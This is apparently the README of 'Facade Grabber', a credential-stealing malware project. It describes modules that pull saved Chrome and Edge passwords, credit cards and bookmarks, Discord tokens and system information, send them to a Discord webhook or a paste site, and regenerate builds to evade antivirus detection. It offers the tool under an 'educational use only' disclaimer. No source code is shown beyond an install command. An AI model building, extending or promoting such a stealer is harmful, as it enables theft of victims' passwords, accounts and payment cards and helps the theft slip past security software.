Facade Grabber is a state of the art password and discord logger. We welcome all help and comments. Please do not use this project with ill intent as this is for private educational use only.
valverus.py: This file is the 'wrapper', it calls chrm.py, edge.py, and disc.py in order to tie them together and then submit them to the discord webhook.
disc.py: This file is the discord logger part, it searches for a discord token stored locally and then if it finds one it gathers data from it and returns it to base.py
chrm.py: This file is the chrome logger part, it gathers all saved passwords from local storage on chrome and returns it to base.py
edge.py: This file is the edge logger part, it gathers all saved passwords, bookmarks, and ccs from local storage on edge and returns it to base.py
sysi.py: This file is the system information part, it gathers system information and returns it to base.py
pste.py: This file enables uploading of the message to paste.facade.cf or any other privatebin instance you choose.
regn.py: This file is the template to automatically regen all your builds as quick as possible in order to evade virus detection.
python3 -m pip install -r requirments.txt